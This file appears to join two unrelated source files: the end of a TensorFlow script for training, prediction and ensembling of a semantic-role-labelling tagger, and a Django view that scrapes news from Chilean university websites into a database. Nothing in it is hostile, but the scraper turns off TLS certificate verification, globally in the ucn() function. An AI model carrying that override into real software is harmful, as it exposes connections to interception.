predictions = {"predictions": logits}
train_op = None
training_chief_hooks = None
elif mode == tf.contrib.learn.ModeKeys.INFER:
model_fn = get_tagger_model(params.model_name, mode)
features["targets"] = labels
with tf.variable_scope("tagger"):
outputs, probs = model_fn(features, params)
predictions = {
"inputs": features["inputs"],
"outputs": outputs,
"distribution": probs
}
loss = None
train_op = None
training_chief_hooks = None
else:
raise ValueError("Unknown mode %s" % mode)
spec = tf.contrib.learn.ModelFnOps(
mode=mode, loss=loss, train_op=train_op,
training_chief_hooks=training_chief_hooks,
predictions=predictions
)
return spec
def session_config(params):
optimizer_options = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L1,
do_function_inlining=False)
graph_options = tf.GraphOptions(optimizer_options=optimizer_options)
config = tf.ConfigProto(allow_soft_placement=True,
graph_options=graph_options)
if params.device_list:
device_str = ",".join([str(i) for i in params.device_list])
config.gpu_options.visible_device_list = device_str
if params.allow_growth:
config.gpu_options.allow_growth = True
return config
def train(args):
tf.logging.set_verbosity(tf.logging.INFO)
params = get_params(args)
vocabulary = get_vocabulary(params.vocab_path)
params.add_hparam("vocabulary", vocabulary)
if args.emb_path:
if args.emb_path.find("glove") > 0:
emb = load_glove_embedding(args.emb_path,
params.vocabulary["inputs"])
else:
emb = np.loadtxt(args.emb_path).astype("float32")
else:
emb = None
params.add_hparam("embedding", emb)
config = tf.contrib.learn.RunConfig(
model_dir=params.model_dir,
session_config=session_config(params),
keep_checkpoint_max=params.keep_checkpoint_max,
save_checkpoints_secs=300
)
# model_fn: (features, labels, mode, params, conifg) => EstimatorSpec
# input_fn: () => (features, labels)
# create estimator
estimator = tf.contrib.learn.Estimator(
model_fn=srl_model,
model_dir=params.model_dir,
config=config,
params=params
)
# create input_fn
train_input_fn = get_input_fn(
params.data_path + "*train*",
tf.contrib.learn.ModeKeys.TRAIN,
params
)
if tf.gfile.Glob(params.data_path + "*dev*"):
eval_input_fn = get_input_fn(
params.data_path + "*dev*", tf.contrib.learn.ModeKeys.EVAL, params
)
else:
eval_input_fn = None
# create experiment
experiment = tf.contrib.learn.Experiment(
estimator=estimator,
eval_metrics=create_tagger_evaluation_metrics(),
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
train_steps=params.train_steps,
eval_steps=params.eval_steps,
min_eval_frequency=params.min_eval_frequency
)
if params.script:
process = multiprocessing.Process(target=validate, args=[params])
process.daemon = True
process.start()
else:
process = None
# start training
try:
if eval_input_fn:
experiment.train_and_evaluate()
else:
experiment.train()
finally:
if process is not None:
process.terminate()
def predict(args):
tf.logging.set_verbosity(tf.logging.INFO)
params = tf.contrib.training.HParams(
data_path=args.data_path,
model_dir=args.model_dir,
model_name=args.model_name,
vocab_path=args.vocab_path,
model_params=args.model_params,
device_list=args.device_list or [0],
allow_growth=True
)
mparams = get_model_params(args.model_name)
params = merge_params(params, mparams)
params.parse(args.model_params)
dparams = decoding_params()
params = merge_params(params, dparams)
params.parse(args.decoding_params)
vocabulary = get_vocabulary(params.vocab_path)
params.add_hparam("vocabulary", vocabulary)
if args.emb_path:
if args.emb_path.find("glove") > 0:
emb = load_glove_embedding(args.emb_path, None)
else:
emb = np.loadtxt(args.emb_path).astype("float32")
else:
emb = None
params.add_hparam("embedding", emb)
config = tf.contrib.learn.RunConfig(
model_dir=params.model_dir,
session_config=session_config(params),
)
# create estimator
estimator = tf.contrib.learn.Estimator(
model_fn=srl_model,
model_dir=params.model_dir,
config=config,
params=params
)
decodes = []
sorted_inputs, sorted_keys, num_batches, input_fn = get_sorted_input_fn(
params.data_path,
params.vocabulary["inputs"],
params.decode_batch_size * len(params.device_list),
params
)
ivocab = {"inputs": {}, "targets": {}}
labels = []
for k, idx in vocabulary["inputs"].items():
ivocab["inputs"][idx] = k
for k, idx in vocabulary["targets"].items():
ivocab["targets"][idx] = k
for idx in range(len(ivocab["targets"])):
labels.append(ivocab["targets"][idx])
tparams = get_transition_params(labels)
for i in range(num_batches):
result_iter = estimator.predict(input_fn=input_fn.next,
as_iterable=True)
for result in result_iter:
inputs = result["inputs"]
outputs = result["outputs"]
dist = result["distribution"]
input_text = []
output_text = []
index = 0
if args.viterbi:
seq_len = 0
while index < len(inputs) and inputs[index] != 0:
seq_len += 1
index += 1
dist = dist[:seq_len, :]
outputs, _ = tf.contrib.crf.viterbi_decode(dist, tparams)
index = 0
while index < len(inputs) and inputs[index] != 0:
input_text.append(ivocab["inputs"][inputs[index]])
output_text.append(ivocab["targets"][outputs[index]])
index += 1
# decode to plain text
input_text = " ".join(input_text)
output_text = " ".join(output_text)
if args.verbose:
sys.stdout.write("INPUT: %s\n" % input_text)
sys.stdout.write("OUTPUT: %s\n" % output_text)
decodes.append(output_text)
sorted_inputs.reverse()
decodes.reverse()
outputs = []
for index in range(len(sorted_inputs)):
outputs.append(decodes[sorted_keys[index]])
if not args.output_name:
base_filename = os.path.basename(params.data_path)
decode_filename = base_filename + "." + params.model_name + ".decodes"
else:
decode_filename = args.output_name
outfile = tf.gfile.Open(decode_filename, "w")
for output in outputs:
outfile.write("%s\n" % output)
outfile.close()
def ensemble(args):
if len(args.vocab_path) != len(args.checkpoints) + 1:
raise ValueError("Unmatched vocabulary number and checkpoint number")
# override parameters
params = tf.contrib.training.HParams(
data_path=args.data_path,
model_name=args.model_name,
vocab_path=args.vocab_path,
model_params=args.model_params,
device_list=args.device_list or [0],
allow_growth=True
)
mparams = get_model_params(args.model_name)
params = merge_params(params, mparams)
params.parse(args.model_params)
dparams = decoding_params()
params = merge_params(params, dparams)
params.parse(args.decoding_params)
if args.emb_path:
if args.emb_path.find("glove") > 0:
emb = load_glove_embedding(args.emb_path, None)
else:
emb = np.loadtxt(args.emb_path).astype("float32")
else:
emb = None
vocabularies = get_ensemble_vocabulary(params.vocab_path)
model_var_lists = []
model_params_list = []
for i in range(len(args.checkpoints)):
cparams = copy.copy(params)
cparams.add_hparam("embedding", emb)
cparams.add_hparam("vocabulary", vocabularies[i])
model_params_list.append(cparams)
# load checkpoints
for checkpoint in args.checkpoints:
var_list = tf.train.list_variables(checkpoint)
values = {}
reader = tf.train.load_checkpoint(checkpoint)
for (name, shape) in var_list:
if not name.startswith("tagger"):
continue
if name.find("losses_avg") >= 0:
continue
tensor = reader.get_tensor(name)
values[name] = tensor
model_var_lists.append(values)
# build graph
inputs = tf.placeholder(tf.int32, [None, None], "inputs")
preds = tf.placeholder(tf.int32, [None, None], "preds")
embedding = tf.placeholder(tf.float32, [None, None, None], "embedding")
mask = tf.placeholder(tf.float32, [None, None], "mask")
features = {"inputs": inputs, "preds": preds}
if emb is not None:
features["embedding"] = embedding
features["mask"] = mask
predictions = []
for i in range(len(args.checkpoints)):
with tf.variable_scope("tagger_%d" % i):
model_fn = get_tagger_model(params.model_name,
tf.contrib.learn.ModeKeys.INFER)
outputs, probs = model_fn(features, model_params_list[i])
predictions.append(probs)
labels = []
ivocab = {}
for k, idx in vocabularies[0]["targets"].items():
ivocab[idx] = k
for idx in range(len(ivocab)):
labels.append(ivocab[idx])
tparams = get_transition_params(labels)
# create session
with tf.Session(config=session_config(params)) as sess:
tf.global_variables_initializer().run()
# restore variables
all_var_list = tf.trainable_variables()
for i in range(len(args.checkpoints)):
uninit_var_list = []
for v in all_var_list:
if v.name.startswith("tagger_%d" % i):
uninit_var_list.append(v)
set_variables(uninit_var_list, model_var_lists[i], "tagger_%d" % i)
# create input_fn
all_sorted_inputs = []
all_sorted_keys = []
all_input_fns = []
for i in range(len(args.checkpoints)):
sorted_inputs, sorted_keys, num_batches, fn = get_sorted_input_fn(
params.data_path,
model_params_list[i].vocabulary["inputs"],
params.decode_batch_size * len(params.device_list),
model_params_list[i]
)
all_sorted_inputs.append(sorted_inputs)
all_sorted_keys.append(sorted_keys)
all_input_fns.append(fn)
decodes = []
for i, input_fn in enumerate(all_input_fns):
outputs = []
for features in input_fn:
feed_dict = {
inputs: features["inputs"],
preds: features["preds"]
}
if args.emb_path:
feed_dict[embedding] = features["embedding"]
feed_dict[mask] = features["mask"]
output = sess.run(predictions[i], feed_dict=feed_dict)
outputs.append(output)
decodes.append(outputs)
# ensemble
decodes = list(zip(*decodes))
probs = []
for item in decodes:
outputs = sum(item) / float(len(item))
# [batch, max_len, num_label]
probs.append(outputs)
count = 0
for item in probs:
for dist in item:
inputs = all_sorted_inputs[0][count]
seq_len = len(inputs.strip().split()[1:])
output_text = []
if args.viterbi:
dist = dist[:seq_len, :]
outputs, _ = tf.contrib.crf.viterbi_decode(dist,
tparams)
else:
dist = dist[:seq_len, :]
outputs = np.argmax(dist, axis=1)
index = 0
while index < seq_len:
output_text.append(ivocab[outputs[index]])
index += 1
# decode to plain text
output_text = " ".join(output_text)
decodes.append(output_text)
count += 1
sorted_inputs.reverse()
decodes.reverse()
outputs = []
for index in range(len(sorted_inputs)):
outputs.append(decodes[sorted_keys[index]])
if not args.output_name:
base_filename = os.path.basename(params.data_path)
model_name = params.model_name
decode_filename = base_filename + "." + model_name + ".decodes"
else:
decode_filename = args.output_name
outfile = tf.gfile.Open(decode_filename, "w")
for output in outputs:
outfile.write("%s\n" % output)
outfile.close()
def helpinfo():
print("usage:")
print("\tmain.py <command> [<args>]")
print("using 'main.py train --help' to see training options")
print("using 'main.py predict --help' to see prediction options")
print("using 'main.py ensemble --help' to see ensembling options")
if __name__ == "__main__":
if len(sys.argv) == 1:
helpinfo()
else:
command = sys.argv[1]
if command == "train":
print("training command:")
print(" ".join(sys.argv))
parsed_args = parseargs_train(sys.argv[2:])
train(parsed_args)
elif command == "predict":
parsed_args = parseargs_predict(sys.argv[2:])
predict(parsed_args)
elif command == "ensemble":
parsed_args = parseargs_ensemble(sys.argv[2:])
ensemble(parsed_args)
else:
helpinfo()
|
views.py
|
from django.shortcuts import render
from news.models import Universidad, Noticia
from bs4 import BeautifulSoup
from django.conf import settings
import feedparser, unicodedata, urllib.request, time, re, datetime, time, threading
import ssl
import dateutil.parser
import logging
import unidecode
import json
result = []
# Create your views here.
def scraper(request):
hora = {}
hora["start"] = time.strftime("%H:%M:%S")
hora_inicio = time.time()
if settings.DEBUG == False:
# Usar hilos para Producción
logging.basicConfig( level=logging.DEBUG, format='[%(levelname)s] - %(threadName)-10s : %(message)s')
universidades = [
{'target':pucv, 'name':'PUCV'},
{'target':ucn, 'name':'UCN'},
{'target':utfsm, 'name':'UTFSM'},
{'target':uv, 'name':'UV'},
{'target':upla, 'name':'UPLA'},
{'target':udec, 'name':'UDEC'},
{'target':utalca, 'name':'UTALCA'},
{'target':ulagos, 'name':'ULAGOS'},
{'target':unap, 'name':'UNAP'},
{'target':ua, 'name':'UA'},
{'target':uda, 'name':'UDA'},
{'target':userena, 'name':'USERENA'},
{'target':uoh, 'name':'UOH'},
{'target':ucm, 'name':'UCM'},
{'target':ubiobio, 'name':'UBIOBIO'},
{'target':ucsc, 'name':'UCSC'},
{'target':ufro, 'name':'UFRO'},
{'target':uct, 'name':'UCT'},
{'target':uach, 'name':'UACH'},
{'target':uaysen, 'name':'UAYSEN'},
{'target':umag, 'name':'UMAG'},
{'target':uta, 'name':'UTA'}
]
# Por cada universidad crea un hilo de ejecución
for universidad in universidades:
threading.Thread(target=universidad['target'], name=universidad['name']).start()
else:
# Este metodo de ejecutar los scraper es muy lento
# Pero el panel uninews.datoslab.cl/scraper solo muestra información acerca de los errores e información si se usa este metodo
# Usar solo para Desarrollo
#pucv() # Funcionando
#ucn() # Funcionando
#utfsm() # Funcionando
#uv() # Funcionando
#upla() # Funcionando #Revisar
#udec() # Funcionando
#utalca() # Funcionando #Revisar
#ulagos() # Funcionando
#ucsc() # Funcionando
#ubiobio() # Funcionando
#uda() # En Funcionando
#userena() # En Funcionando #Revisar
# unap() # Funcionando
#ua() # Funcionando
# uoh() #No se pudo scrapear - Página hecha con angular
# ucm() # Funcionando
ufro() # Funcionando
# uct() # Funcionando - detalles de rendimiento
# uach() # Funcionando
# uaysen() #Funcionando
# umag() # Funcionando - Revisar la bajada
# uta() # Funcionando
hora_fin = time.time()
hora["finish"] = time.strftime("%H:%M:%S")
hora["total"] = hora_fin - hora_inicio
result.append({'status':"", 'error_message':'', 'universidad':'', 'titulo':'', 'bajada':'', 'fecha':'', 'link_noticia':'', 'link_recurso':'', 'categoria':''})
return render(request, "scraper/scraper.html", {'result':result, 'hora':hora})
def saveNew(new):
try:
# Busca la noticia en la base de datos
# Si no la encuentra genera un error y ejecuta el except
n = Noticia.objects.get(titulo=new['titulo'], id_universidad__alias = new['universidad'].alias)
print(new['universidad'].alias + ": " + new['titulo'] + " | Existe")
e = "Existe"
# Si la encuentra agrega un mensaje que se mostrará al de depuración
result.append({'status':"exist", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
except Noticia.DoesNotExist as e:
# Si la noticia no se encuentra la crea
n = Noticia(
titulo=new['titulo'],
titulo_busqueda=formatear_busqueda(new['titulo']),
bajada=new['bajada'],
bajada_busqueda=formatear_busqueda(new['bajada']),
fecha=new['fecha'],
link_noticia=new['link_noticia'],
link_recurso=new['link_recurso'],
id_universidad=new['universidad'],
categoria=new['categoria'],
contador_visitas=0
)
n.save() # Guarda la noticia en la base de datos
print(new['universidad'].alias + ": " + new['titulo'] + " | Insertada")
e = "Insertada"
result.append({'status':"ok", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
def formatear_busqueda(text):
# Al cambiar algo tambien debe ser modificado en search_fix de views de news
text = unidecode.unidecode(text).lower()
text = text.replace('"', "")
text = text.replace('?', "")
text = text.replace('¿', "")
text = text.replace(':', "")
text = text.replace('#', "")
text = text.replace('.', "")
text = text.replace(',', "")
text = text.replace(';', "")
text = text.replace('(', "")
text = text.replace(')', "")
return text
def formatear_fecha(fecha, universidad):
if universidad == "uv":
fecha = fecha.split()
dia = fecha[0]
mes = fecha[2].lower()
anno = fecha[4]
elif universidad == "upla":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "ufsm":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "ucn":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "pucv":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[3].lower()
anno = fecha[5]
elif universidad == "udec":
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == "utalca":
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == "ulagos":
fecha = fecha.lower().split('/')
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == "ucsc":
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == "ubiobio":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == 'uda':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'userena':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'unap':
fecha = fecha.lower().split()
dia = fecha[1]
mes = fecha[3]
anno = fecha[5]
elif universidad == 'ua':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'ucm':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'ufro':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uta':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'umag':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uaysen':
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == 'uach':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uct':
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
if mes == "enero" or mes == "jan" or mes == '1':
mes = '01'
elif mes == "febrero" or mes == "feb" or mes == '2':
mes = '02'
elif mes == "marzo" or mes == "mar" or mes == '3':
mes = '03'
elif mes == "abril" or mes == "apr" or mes == '4':
mes = '04'
elif mes == "mayo" or mes == "may" or mes == '5':
mes = '05'
elif mes == "junio" or mes == "jun" or mes == '6':
mes = '06'
elif mes == "julio" or mes == "jul" or mes == '7':
mes = '07'
elif mes == "agosto" or mes == "aug" or mes == '8':
mes = '08'
elif mes == "septiembre" or mes == "sep" or mes == '9':
mes = '09'
elif mes == "octubre" or mes == "oct" or mes == '10':
mes = '10'
elif mes == "noviembre" or mes == "nov" or mes == '11':
mes = '11'
elif mes == "diciembre" or mes == "dec" or mes == '12':
mes = '12'
if dia == "1":
dia = '01'
elif dia == "2":
dia = '02'
elif dia == "3" :
dia = '03'
elif dia == "4":
dia = '04'
elif dia == "5":
dia = '05'
elif dia == "6":
dia = '06'
elif dia == "7":
dia = '07'
elif dia == "8":
dia = '08'
elif dia == "9":
dia = '09'
#fecha = dia + "/" + mes + "/" + anno
fecha = anno + "-" + mes + "-" + dia
return fecha
# Realiza limpieza a cada categoria
def setCategoria(categoria = ''):
if categoria == '' or categoria == None:
return 'sin-categoria'
else:
categoria = categoria.lower()
categoria = elimina_tildes(categoria)
categoria = categoria.replace(" ", "-")
categoria = categoria.replace("&", "y")
categoria = categoria.replace("#", "")
categoria = categoria.replace(",", "-")
return categoria
def elimina_tildes(s):
return ''.join((c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn'))
# Universidad de Playa Ancha
def upla():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UPLA')
url_rss = "https://www.upla.cl/noticias/feed/" # URL de feed RSS
feed = feedparser.parse( url_rss ) # Se obtiene el XML y se procesa
for item in feed['items']:
try:
titulo = item['title']
bajada = item['summary']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "upla")
# Se obtiene y filtra la categoria para ser buscada
categoria_busqueda = setCategoria(item['category'])
if categoria_busqueda == 'gestion-institucional':
categoria_busqueda = 'gestion'
# Entra en la pagina de cada categoria y busca todas las noticias
contents = urllib.request.urlopen("https://www.upla.cl/noticias/category/"+categoria_busqueda).read()
bs = BeautifulSoup(contents, "html.parser")
# Se realizan ajustes para las catergorias con alguna particularidad
if categoria_busqueda == 'coronavirus':
articles = bs.find_all("div", ["timeline-content"])
else:
articles = bs.find_all("article", ["item-list"])
# Por cada noticia de cada categoria obtiene su titulo
for article in articles:
if categoria_busqueda == 'coronavirus':
titulo_articulo = article.h2.a.text
else:
titulo_articulo = article.find("a").text
# Si el titulo de la noticia es igual al titulo obtenido del XML, obtiene la imagen de esa noticia y termina el ciclo
if titulo_articulo == titulo:
imagen = article.find("img")['src']
break
else:
imagen = ''
# Se ejecuta la función para guardar la noticia en la base de datos
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
# Si ocurre un error se individualiza y se prepara para mostrar
# en la pantalla de depuración
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Pontificia Universidad Católica de Valparaíso
def pucv():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='PUCV')
nombre_uni = "pucv"
context = ssl._create_unverified_context()
contents = urllib.request.urlopen("https://www.pucv.cl/pucv/site/tax/port/all/taxport_1___1.html", context=context).read()
bs = BeautifulSoup(contents, "html.parser")
articulos = bs.find_all("article")
for articulo in articulos:
try:
link = articulo.a['href']
link = "https://www.pucv.cl" + link.replace("..", "")
fecha = articulo.find("span",{"class":"fecha aright"})
imagen = articulo.img['src']
imagen = "https://pucv.cl" + imagen.replace("..","")
pagina_noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
titulo = bs_noticia.find("h1", { "class" : "titular" }).text
if fecha is None:
fecha = time.strftime("%Y-%m-%d")
else:
fecha = formatear_fecha(fecha.text,nombre_uni)
try:
bajada = bs_noticia.find("p",{ "class" : "bajada" }).text
except Exception as e:
bajada = ''
result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
# No encuentra una categoría
try:
newpage = urllib.request.urlopen(link).read()
bs_cate = BeautifulSoup(newpage, "html.parser")
categoria = bs_cate.find("div",{ "class" : "breadcrumbs" })
categorias = categoria.findAll("a")
category = categorias[2].text
categoria_busqueda = setCategoria(category)
except Exception as e:
categoria_busqueda = 'sin-categoria'
result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
saveNew({'status':"ok", 'error_message':'', 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Católica del Norte
def ucn():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCN')
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
d = feedparser.parse("https://www.noticias.ucn.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
nombre_uni = "ucn"
link = (e.link)
categoria_busqueda = setCategoria((e.category))
fecha = e.published
fecha = formatear_fecha(fecha,nombre_uni)
description = e.description.split("/>")
bajada = description[1]
cuerpo = e['content']
contenido = cuerpo[0].value
imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url").replace("-150x150", "")
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
#Universidad Técnico Federico Santa María
def utfsm():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTFSM')
d = feedparser.parse("https://noticias.usm.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
nombre_uni = "ufsm"
link = (e.link)
categoria_busqueda = setCategoria((e.category))
bajada = (e.description).replace("[…]", "").strip()
fecha = e.published
fecha = formatear_fecha(fecha,nombre_uni)
cuerpo = e['content']
contenido = cuerpo[0].value
try:
imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
except:
imagen = ''
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Valparaíso
def uv():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UV')
contents = urllib.request.urlopen("https://www.uv.cl/pdn/archivo/").read()
bs = BeautifulSoup(contents, "html.parser")
divs = bs.find_all("div", ["item n_caja borde6", "item n_caja borde6 fin"])
for div in divs:
try:
fecha = div.find("div", ["fecha"]).text
fecha = formatear_fecha(fecha, "uv")
link = div.a['href']
link = "https://www.uv.cl/pdn" + link.replace("..", "")
# Accede a la pagina de la noticia
pagina_noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
titulo = bs_noticia.find("div", id="n_titulo").text
bajada = bs_noticia.find("div", id="n_bajada").text
try:
imagen = bs_noticia.find("div", id="n_clipex").img['src']
imagen = "https://www.uv.cl" + imagen
except TypeError:
imagen = div.find("img", ["sombra"])['src']
imagen = "https://www.uv.cl/pdn" + imagen.replace("..", "")
categoria_busqueda = setCategoria()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Concepción
def udec():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UDEC')
url_rss = "https://noticias.udec.cl/feed/"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text.strip()
fecha = item['published']
fecha = formatear_fecha(fecha, "udec")
categoria_busqueda = setCategoria(item['category'])
imagen = BeautifulSoup(urllib.request.urlopen(link).read(), "html.parser").find_all('img', {'class': 'attachment-large size-large'})[1]['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Talca
def utalca():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTALCA')
contents = urllib.request.urlopen("https://www.utalca.cl/noticias/").read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find('div', {'class': 'section-news'})
items = items.find_all("div", {"class": "card-news"})
items = list(set(items)) # Elimina elementos duplicados
for item in items:
try:
link = item.a['href']
titulo = item.find("h5").text
if item.div.p is None:
categoria_busqueda = setCategoria()
else:
categoria_busqueda = setCategoria(item.div.p.text)
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class": "interior-body"}).h6.text
fecha = bs_noticia.find("div", {"class": "interior-body"}).span.text
fecha = formatear_fecha(fecha, 'utalca')
imagen = bs_noticia.find("img", {"class": "attachment-post-thumbnail size-post-thumbnail wp-post-image"})['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Los Lagos
def ulagos():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='ULAGOS')
items = []
categorias = ['campus-osorno', 'campus-pto-montt', 'sede-santiago', 'sede-chiloe']
for categoria in categorias:
contents = urllib.request.urlopen("https://www.ulagos.cl/category/" + categoria + "/").read()
bs = BeautifulSoup(contents, "html.parser")
items.extend(bs.find_all("div", {"class": "ultimas-noticias"}))
for item in items:
try:
link = item.a['href']
titulo = item.find("div", {"class": "overflow_titulo_noticias"}).text.strip()
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class":"title-post"}).span.text.strip()
categoria_busqueda = bs_noticia.find("div", {"class":"category-post"}).a.text.lower().strip()
categoria_busqueda = setCategoria(categoria_busqueda)
fecha = bs_noticia.find("div", {"class":"conten-post-date"}).text.strip()
fecha = formatear_fecha(fecha, "ulagos")
if bs_noticia.find("img", {"class": "img-destacado"}) is None:
imagen = ''
else:
imagen = bs_noticia.find("img", {"class": "img-destacado"})["src"]
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Católica de la Santísima Concepción
def ucsc():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCSC')
contents = urllib.request.urlopen("https://www.ucsc.cl/noticias/").read()
